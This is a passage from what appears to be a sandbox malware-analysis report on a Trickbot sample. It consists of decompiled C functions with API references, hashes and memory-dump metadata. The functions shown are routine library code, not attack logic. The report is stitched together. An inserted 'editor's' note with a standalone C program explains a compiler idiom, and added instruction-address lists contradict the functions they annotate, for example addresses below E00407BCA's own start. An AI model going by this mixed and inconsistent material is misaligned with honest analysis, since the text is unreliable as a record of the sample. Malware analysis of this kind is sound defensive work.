                          • LoadBitmapA.USER32(00000000,00007FE3), ref: 0043066E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                          • String ID:
                          • API String ID: 2596413745-3916222277
                          • Opcode ID: ffe0ab43228ff084a4f90911189f8d1ddff9719e02bfd38893963e0d24404ed9
                          • Instruction ID: f26c7202a2d319040538dd7cd5e6e728001670d89d8c8ed09b5f1c03cfacdf42
                          • Opcode Fuzzy Hash: ffe0ab43228ff084a4f90911189f8d1ddff9719e02bfd38893963e0d24404ed9
                          • Instruction Fuzzy Hash: 55213A71E00315AFEB10CF78DC8ABAE7BB8EB44700F055266E405EB282D674DA04CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0040F99A(void* __ecx) {
                          				signed int _t22;
                          				signed char _t36;
                          				char* _t43;
                          				void* _t45;
                          
                          				E00405340(E00438DBC, _t45);
                          				_t22 =  *(_t45 + 8) & 0x00000007;
                          				 *(__ecx + 4) = _t22;
                          				_t36 =  *(__ecx + 8) & _t22;
                          				if(_t36 != 0) {
                          					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                          						E00405861(0, 0);
                          					}
                          					_t52 = _t36 & 0x00000004;
                          					if((_t36 & 0x00000004) == 0) {
                          						__eflags = _t36 & 0x00000002;
                          						_t43 = "ios::failbit set";
                          						if((_t36 & 0x00000002) == 0) {
                          							_t43 = "ios::eofbit set";
                          						}
                          					} else {
                          						_t43 = "ios::badbit set";
                          					}
                          					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
                          					E0040E765(_t45 - 0x1c, 0);
                          					E0040E9CB(_t45 - 0x1c, _t45, _t43, E00409BE0(_t43));
                          					_push(_t45 - 0x1c);
                          					 *((intOrPtr*)(_t45 - 4)) = 0;
                          					E0040FA36(_t45 - 0x38, _t52);
                          					 *((intOrPtr*)(_t45 - 0x38)) = 0x43ecdc;
                          					_t22 = E00405861(_t45 - 0x38, 0x443f70);
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                          				return _t22;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0040F99F
                            • Part of subcall function 00405861: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0040588F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ExceptionH_prologRaise
                          • String ID: ios::badbit set$ios::eofbit set$ios::failbit set
                          • API String ID: 3968804221-425934345
                          • Opcode ID: 8f7860b5969a299d8171c9c0b3cb4ded9c30d0d675705e0a2a0961ac3a254688
                          • Instruction ID: 22ca2f90c919cb8fc34a7d47afa2fb2c336a97883ef66b32558618a45977eb88
                          • Opcode Fuzzy Hash: 8f7860b5969a299d8171c9c0b3cb4ded9c30d0d675705e0a2a0961ac3a254688
                          • Instruction Fuzzy Hash: 4C1170B2D01149AAC710EBA6D892AEF7778AB04308F14903BF805766C2E63C9909CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041F0AF(void* __eflags) {
                          				intOrPtr _t22;
                          				intOrPtr _t45;
                          				void* _t47;
                          				void* _t52;
                          
                          				_t52 = __eflags;
                          				E00405340(E00437A1B, _t47);
                          				_t22 =  *0x447478; // 0x44748c
                          				 *((intOrPtr*)(_t47 - 0x14)) = 0;
                          				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
                          				_t45 = 1;
                          				 *((intOrPtr*)(_t47 - 4)) = _t45;
                          				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
                          				 *( *(_t47 + 0xc)) = 0;
                          				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E004181F7(_t47 - 0x10, _t47, 0x105));
                          				E00418246(_t47 - 0x10, _t52, 0xffffffff);
                          				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
                          					E0041D456( *((intOrPtr*)(_t47 - 0x10)));
                          				}
                          				E00417C3D( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
                          				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
                          				 *((char*)(_t47 - 4)) = 0;
                          				E00417EC8(_t47 - 0x10);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                          				return  *((intOrPtr*)(_t47 + 8));
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041F0B4
                          • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0041F0E7
                          • GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000), ref: 0041F10D
                            • Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259
                            • Part of subcall function 0041D456: DeleteFileA.KERNEL32(?), ref: 0041D45A
                            • Part of subcall function 0041D456: GetLastError.KERNEL32(00000000), ref: 0041D465
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
                          • String ID: MFC
                          • API String ID: 501224598-3472178984
                          • Opcode ID: 8bc5e64123c978b0ca69b2365c6ce1504c3736efebab67727d5b29e1de8738a7
                          • Instruction ID: bb4439f9e9b66fb19035fbe3e0267505a95521a72802ad2b31f37c00ac6d6f1d
                          • Opcode Fuzzy Hash: 8bc5e64123c978b0ca69b2365c6ce1504c3736efebab67727d5b29e1de8738a7
                          • Instruction Fuzzy Hash: 92114FB5900219EFDB00EF94DC819EEBB78FB08314F00456AF921A7190D7789A84CBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E0041D4B6(void* __ecx, void* __eflags) {
                          				CHAR* _t24;
                          				struct HINSTANCE__* _t27;
                          				_Unknown_base(*)()* _t31;
                          				CHAR* _t38;
                          				void* _t39;
                          				void* _t41;
                          
                          				E00405340(E004384FC, _t41);
                          				_t38 =  *(_t41 + 0x10);
                          				 *_t38 =  *_t38 & 0x00000000;
                          				E0041D553(_t41 - 0x10,  *((intOrPtr*)(_t41 + 8)));
                          				_t24 =  *0x447478; // 0x44748c
                          				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                          				 *(_t41 + 0x10) = _t24;
                          				 *(_t41 - 4) = 1;
                          				if(E0041D5C2( *((intOrPtr*)(_t41 - 0x10)), _t41 + 0x10) != 0) {
                          					_t27 = LoadLibraryA( *(_t41 + 0x10));
                          					if(_t27 == 0) {
                          						goto L1;
                          					}
                          					_t31 = GetProcAddress(_t27, "DllGetClassObject");
                          					if(_t31 == 0) {
                          						_t39 = 0x800401f9;
                          					} else {
                          						_t39 =  *_t31( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t38);
                          					}
                          					L6:
                          					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                          					E00417EC8(_t41 + 0x10);
                          					 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
                          					E00417EC8(_t41 - 0x10);
                          					 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                          					return _t39;
                          				}
                          				L1:
                          				_t39 = 0x80040154;
                          				goto L6;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0041D4BB
                            • Part of subcall function 0041D553: wsprintfA.USER32 ref: 0041D5A3
                            • Part of subcall function 0041D5C2: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 0041D5E3
                            • Part of subcall function 0041D5C2: RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 0041D5F7
                            • Part of subcall function 0041D5C2: RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 0041D612
                            • Part of subcall function 0041D5C2: RegQueryValueExA.ADVAPI32(?,00449350,00000000,?,00000000,?,00000104), ref: 0041D63B
                            • Part of subcall function 0041D5C2: RegCloseKey.ADVAPI32(?,000000FF), ref: 0041D659
                            • Part of subcall function 0041D5C2: RegCloseKey.ADVAPI32(00000001), ref: 0041D65E
                            • Part of subcall function 0041D5C2: RegCloseKey.ADVAPI32(?), ref: 0041D663
                          • LoadLibraryA.KERNEL32(?), ref: 0041D4FE
                          • GetProcAddress.KERNEL32(00000000,DllGetClassObject,?,?,0041D48D,?,0043EB78,00000000), ref: 0041D50E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                          • String ID: DllGetClassObject
                          • API String ID: 821125782-1075368562
                          • Opcode ID: 4a8370be90e33a51bc95324451679615b72646fab866b861d75234d99f63e4df
                          • Instruction ID: 93839fda6c0f7cc7694f3a88825118a1c7ede2de16b31bf19d6902fe3e05a4cd
                          • Opcode Fuzzy Hash: 4a8370be90e33a51bc95324451679615b72646fab866b861d75234d99f63e4df
                          • Instruction Fuzzy Hash: 07115E7191025AEBCF119F64CC05BEE7BB9EF04358F10446AF825A61A0D778AE54CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E004309F8() {
                          				signed short _v16;
                          				signed short _v20;
                          				char _v24;
                          				signed int _t6;
                          				intOrPtr* _t16;
                          				signed int _t19;
                          
                          				_t6 =  *0x4478f8; // 0xffffffff
                          				if(_t6 != 0xffffffff) {
                          					return _t6;
                          				}
                          				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                          				_t19 = 0x40000;
                          				if(_t16 != 0) {
                          					E00405360( &_v24, 0, 0x14);
                          					_v24 = 0x14;
                          					_push( &_v24);
                          					if( *_t16() >= 0) {
                          						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                          					}
                          				}
                          				 *0x4478f8 = _t19;
                          				return _t19;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 00430A0F
                          • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00430A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: COMCTL32.DLL$DllGetVersion
                          • API String ID: 1646373207-1518460440
                          • Opcode ID: 2ba1470fe9eaf14c34b93460787331a8861a58831de3e76916504415076bd2e4
                          • Instruction ID: 432aa2954531b1f26eda2fdcb1b63a56cd6e22fcf95aab065aa73b88cd92e205
                          • Opcode Fuzzy Hash: 2ba1470fe9eaf14c34b93460787331a8861a58831de3e76916504415076bd2e4
                          • Instruction Fuzzy Hash: 40F044B1E0032956D710A7E9AC49BAA77E8A718755F101136FA14F31D0D2B4DD0487A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041C7D0(void** __ecx, intOrPtr _a4, char _a8) {
                          				intOrPtr _t8;
                          				void* _t10;
                          				signed int _t13;
                          				void* _t18;
                          				signed int* _t21;
                          				void** _t23;
                          
                          				_t1 =  &_a8; // 0x417672
                          				_t8 =  *_t1;
                          				_t23 = __ecx;
                          				 *((intOrPtr*)(__ecx + 4)) = _t8;
                          				_t10 = GlobalAlloc(0x40, _t8 + 0x40);
                          				 *_t23 = _t10;
                          				if(_t10 != 0) {
                          					_t21 = GlobalLock(_t10);
                          					E00405400(_t21, _a4, _t23[1]);
                          					if(_t21[0] != 0xffff) {
                          						_t13 =  *_t21;
                          					} else {
                          						_t13 = _t21[3];
                          					}
                          					_t23[2] =  !_t13 >> 0x00000006 & 0x00000001;
                          					GlobalUnlock( *_t23);
                          					_t18 = 1;
                          					return _t18;
                          				}
                          				return _t10;
                          			}

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,rvA,?,0041C7C9,?,00000000,?,?,00417672,?,00000000,?), ref: 0041C7E0
                          • GlobalLock.KERNEL32(00000000,?,?,00417672,?,00000000,?), ref: 0041C7EE
                          • GlobalUnlock.KERNEL32(?,?,00417672,?,00000000,?), ref: 0041C822
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$AllocLockUnlock
                          • String ID: rvA
                          • API String ID: 3972497268-3498756698
                          • Opcode ID: 77d5fd399ad9eae8306100da8a6541f83ac00fad0d4aabd55f58c2dbcafa4645
                          • Instruction ID: 689f8e1c12338ae9ecab0fcdf3bd1a7f7d155b3142424dfff37cbb3affb9b701
                          • Opcode Fuzzy Hash: 77d5fd399ad9eae8306100da8a6541f83ac00fad0d4aabd55f58c2dbcafa4645
                          • Instruction Fuzzy Hash: 0CF09672900602AFD7209FA5DC89E67B7F4FB48711B14C82EF555C3250D774D891CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E004225BE(struct HWND__* _a4, intOrPtr _a8) {
                          				char _v16;
                          				signed int _t13;
                          
                          				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                          					return 0;
                          				} else {
                          					GetClassNameA(_a4,  &_v16, 0xa);
                          					_t13 = lstrcmpiA( &_v16, "combobox");
                          					asm("sbb eax, eax");
                          					return  ~_t13 + 1;
                          				}
                          			}

                          APIs
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF
                          • GetClassNameA.USER32(00000000,?,0000000A), ref: 004225EA
                          • lstrcmpiA.KERNEL32(?,combobox), ref: 004225F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClassLongNameWindowlstrcmpi
                          • String ID: combobox
                          • API String ID: 2054663530-2240613097
                          • Opcode ID: 5535f7b0375449af03b9945d7961be83123b90210762a0789c7d4255cb98595f
                          • Instruction ID: 4084231c94a1c79152f266541867287252df8db8380d57d64c55b9fd5e0d93c0
                          • Opcode Fuzzy Hash: 5535f7b0375449af03b9945d7961be83123b90210762a0789c7d4255cb98595f
                          • Instruction Fuzzy Hash: 8BE06532654108BBCF119F60EC49E9D3768E715345F50C121B812D51F0D7B4EA85DB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00407BCA() {
                          				signed int _v12;
                          				signed long long _v20;
                          				signed long long _v28;
                          				void* _t10;
                          				struct HINSTANCE__* _t19;
                          
                          				_t19 = GetModuleHandleA("KERNEL32");
                          				if(_t19 == 0) {
                          					L6:
                          					_v12 =  *0x43e6b0;
                          					_v20 =  *0x43e6a8;
                          					asm("fsubr qword [ebp-0x10]");
                          					_v28 = _v20 / _v12 * _v12;
                          					asm("fcomp qword [0x43e6a0]");
                          					asm("fnstsw ax");
                          					asm("sahf");
                          					if(_t19 <= 0) {
                          						return 0;
                          					} else {
                          						_t10 = 1;
                          						return _t10;
                          					}
                          				} else {
                          					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                          					if(__eax == 0) {
                          						goto L6;
                          					} else {
                          						_push(0);
                          						return __eax;
                          					}
                          				}
			}

                          Instruction addresses (one per C line above, in listing order; 0x00000000 where no instruction maps):
                          0x00407bd5 0x00407bd7 0x00407bee 0x00407b98 0x00407ba1 0x00407bad 0x00407bb0 0x00407bb6 0x00407bbc 0x00407bbe
                          0x00407bbf 0x00407bc9 0x00407bc1 0x00407bc3 0x00407bc5 0x00407bc5 0x00407bd9 0x00407bdf 0x00407be7 0x00000000
                          0x00407be9 0x00407be9 0x00407bed 0x00407bed 0x00407be7

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,00404FE0), ref: 00407BCF
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407BDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          • Opcode ID: 8e0a3abbf03ecb08a25e6692be1e91d9193d15f6f5dd8fe7d5c554f1cba35dc9
                          • Instruction ID: 38e3e38c87443376e618666a2d966511a7ffde51e86cea0a72677456cd78b31c
                          • Opcode Fuzzy Hash: 8e0a3abbf03ecb08a25e6692be1e91d9193d15f6f5dd8fe7d5c554f1cba35dc9
                          • Instruction Fuzzy Hash: 64C012A074D20152EAD017620D09B6735289B4CB46F2820367806E51C0CBACF400853E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0041E4AE(intOrPtr __ecx, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
                          				intOrPtr _v8;
                          				char _v268;
                          				void* __ebp;
                          				void* _t41;
                          				intOrPtr _t43;
                          				void* _t46;
                          				signed int _t54;
                          				CHAR* _t56;
                          				int _t66;
                          				CHAR* _t73;
                          				signed int _t76;
                          				void* _t77;
                          				void* _t79;
                          				void* _t80;
                          
                          				_t76 = _a8 << 2;
                          				_v8 = __ecx;
                          				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t76)) - 8)) != 0) {
                          					_t73 = E004181F7(_a4, _t80, 0x104);
                          					lstrcpyA(_t73,  *( *((intOrPtr*)(_v8 + 8)) + _t76));
                          					_t41 = E00433CD5(_t73, 0, 0);
                          					_t77 = 1;
                          					_t79 = _t77 - _t41 + lstrlenA(_t73);
                          					_t43 = _a16;
                          					__eflags = _t79 - _t43;
                          					if(_t79 != _t43) {
                          						L5:
                          						__eflags =  *((intOrPtr*)(_v8 + 0x18)) - 0xffffffff;
                          						if(__eflags != 0) {
                          							_a8 = _t79 + _t73;
                          							E0041D9E9(_t79 + _t73,  &_v268, 0x104);
                          							_t66 = 0x104 - _t79;
                          							__eflags = _t66;
                          							lstrcpynA(_a8,  &_v268, _t66);
                          							E0041E1B5(__eflags, _t73,  *((intOrPtr*)(_v8 + 0x18)), _a20);
                          						}
                          						L7:
                          						E00418246(_a4, __eflags, 0xffffffff);
                          						_t46 = 1;
                          						return _t46;
                          					}
                          					 *(_t43 + _t73) =  *(_t43 + _t73) & 0x00000000;
                          					_a11 =  *((intOrPtr*)(_t79 + _t73));
                          					_a16 = _t43 + _t73;
                          					_t54 = lstrcmpiA(_a12, _t73);
                          					asm("sbb eax, eax");
                          					_t56 =  ~_t54 + 1;
                          					__eflags = _t56;
                          					_a12 = _t56;
                          					 *((char*)(_t79 + _t73)) = _a11;
                          					if(_t56 == 0) {
                          						goto L5;
                          					}
                          					E0041D9E9(_a16,  &_v268, 0x104);
                          					lstrcpynA(_t73,  &_v268, 0x104);
                          					goto L7;
                          				}
                          				return 0;
			}

                          Instruction addresses (one per C line above, in listing order; 0x00000000 where no instruction maps):
                          0x0041e4c0 0x0041e4c3 0x0041e4cd 0x0041e4e6 0x0041e4f2 0x0041e4fd 0x0041e504 0x0041e50e 0x0041e510 0x0041e513
                          0x0041e515 0x0041e561 0x0041e564 0x0041e568 0x0041e576 0x0041e579 0x0041e57e 0x0041e57e 0x0041e58b 0x0041e59b
                          0x0041e59b 0x0041e5a0 0x0041e5a5 0x0041e5ac 0x00000000 0x0041e5ae 0x0041e51a 0x0041e524 0x0041e527 0x0041e52a
                          0x0041e532 0x0041e534 0x0041e534 0x0041e535 0x0041e53b 0x0041e53e 0x00000000 0x00000000 0x0041e54b 0x0041e559
                          0x00000000 0x0041e559 0x00000000

                          APIs
                          • lstrcpyA.KERNEL32(00000000,00000000,00000104), ref: 0041E4F2
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E508
                          • lstrcmpiA.KERNEL32(?,00000000), ref: 0041E52A
                          • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 0041E559
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrcpynlstrlen
                          • String ID:
                          • API String ID: 4224384254-0
                          • Opcode ID: 5cbda47931067a0d2fd55e089f4ce8e0d71eff1479bb35dac2353a040323c55d
                          • Instruction ID: f78754b319c355faeaaecf17be6717dd5136e3bd3a8142c56366dd4383a44a38
                          • Opcode Fuzzy Hash: 5cbda47931067a0d2fd55e089f4ce8e0d71eff1479bb35dac2353a040323c55d
                          • Instruction Fuzzy Hash: 4931BCB6500148FFCB20DFA8CC85EEA3BB9AB48318F10416AF8459B291E774DD81DB64
                          Uniqueness

                          Uniqueness Score: -1.00%
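Reading note and added example (editor's code, not part of the Joe Sandbox report and not code from the sample): both the "combobox" check at the top of this section and the lstrcmpiA comparison in E0041E4AE end with the decompiler emitting asm("sbb eax, eax") followed by ~_t + 1. That is how the MSVC code sequence neg eax / sbb eax, eax / inc eax, which the compiler uses for "return f() == 0;", survives decompilation. Read that way, the class check returns 1 only when the window class name is "combobox" (case-insensitive), and in E0041E4AE _a12 is 1 exactly when lstrcmpiA reported equality, so "if(_t56 == 0) goto L5" is the not-equal branch. The C below emulates the three instructions on a 32-bit register to confirm the equivalence with (x == 0); ci_compare is an ASCII stand-in for lstrcmpiA, assumed here so the block runs off Windows.

```c
/*
 * Added example (editor's code, not from the sample or the report): what the
 * decompiler's  asm("sbb eax, eax"); return ~x + 1;  stands for.
 * MSVC emits   neg eax / sbb eax, eax / inc eax   after a call to compute
 * "result == 0" as 1 or 0. Emulating those three instructions on a 32-bit
 * register shows the value is exactly (x == 0) ? 1 : 0.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

typedef struct { uint32_t eax; bool cf; } regs;

/* NEG sets CF iff the operand was non-zero, and leaves the two's complement in EAX. */
static void x86_neg_eax(regs *r)     { r->cf = (r->eax != 0); r->eax = 0u - r->eax; }
/* SBB eax, eax computes eax - eax - CF, i.e. EAX becomes 0 or 0xFFFFFFFF depending on CF. */
static void x86_sbb_eax_eax(regs *r) { r->eax = r->eax - r->eax - (r->cf ? 1u : 0u); }
/* INC does not touch CF; it turns 0xFFFFFFFF into 0 and 0 into 1. */
static void x86_inc_eax(regs *r)     { r->eax += 1u; }

/* The idiom as the CPU executes it. */
uint32_t neg_sbb_inc(uint32_t eax) {
    regs r = { eax, false };
    x86_neg_eax(&r);
    x86_sbb_eax_eax(&r);
    x86_inc_eax(&r);
    return r.eax;
}

/* Hypothetical ASCII-only stand-in for lstrcmpiA: negative, zero or positive like the API. */
int ci_compare(const char *a, const char *b) {
    for (;; a++, b++) {
        int ca = (unsigned char)*a, cb = (unsigned char)*b;
        if (ca >= 'A' && ca <= 'Z') ca += 'a' - 'A';
        if (cb >= 'A' && cb <= 'Z') cb += 'a' - 'A';
        if (ca != cb || ca == 0) return ca - cb;
    }
}

/* Model of the tail of the first listing: 1 iff the class name is "combobox" in any case. */
int class_is_combobox(const char *class_name) {
    return (int)neg_sbb_inc((uint32_t)ci_compare(class_name, "combobox"));
}

/* Sweep the sign and overflow corners to confirm the sequence equals (x == 0). */
int idiom_equals_is_zero(void) {
    const uint32_t probes[] = { 0u, 1u, 2u, 0x7fffffffu, 0x80000000u, 0xffffffffu, 0xfffffff0u };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        if (neg_sbb_inc(probes[i]) != (probes[i] == 0u ? 1u : 0u)) return 0;
    return 1;
}

int main(void) {
    printf("neg/sbb/inc(0)=%u  neg/sbb/inc(-1)=%u  ComboBox? %d  Edit? %d\n",
           neg_sbb_inc(0u), neg_sbb_inc(0xffffffffu),
           class_is_combobox("ComboBox"), class_is_combobox("Edit"));
    return 0;
}
```

The same reading applies wherever this report shows sbb eax, eax next to a call returning a comparison or error code: the surrounding value is a boolean for "call returned zero", not the raw return value.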

                          C-Code - Quality: 100%
                          			E00408204(signed int* _a4, signed char _a8, char _a11) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				intOrPtr* _v20;
                          				signed int _v24;
                          				intOrPtr _t165;
                          				intOrPtr* _t166;
                          				intOrPtr _t167;
                          				signed int* _t168;
                          				intOrPtr _t170;
                          				intOrPtr _t171;
                          				intOrPtr _t173;
                          				intOrPtr _t175;
                          				intOrPtr _t177;
                          				signed int _t179;
                          				intOrPtr _t182;
                          				signed int _t187;
                          				signed int* _t195;
                          				signed int _t199;
                          				signed int _t201;
                          				signed int _t206;
                          				signed int _t209;
                          				signed char _t212;
                          				signed int _t213;
                          				intOrPtr _t219;
                          				char _t220;
                          				char _t221;
                          				signed int _t230;
                          				signed int _t231;
                          				signed int _t232;
                          				signed int _t234;
                          				signed char _t236;
                          				char* _t239;
                          				char* _t241;
                          				signed char _t244;
                          				intOrPtr _t247;
                          				signed char _t248;
                          				char* _t251;
                          				char* _t253;
                          				signed char _t255;
                          				signed int* _t256;
                          				intOrPtr _t259;
                          				signed int _t261;
                          				signed int _t267;
                          				signed int _t270;
                          				signed int _t274;
                          				signed char _t280;
                          				intOrPtr _t282;
                          				signed int _t285;
                          				signed int _t288;
                          				signed int _t291;
                          				void* _t320;
                          
                          				_t255 = _a8;
                          				_t195 = _a4;
                          				_t3 = _t195 + 0x10; // 0x5756006a
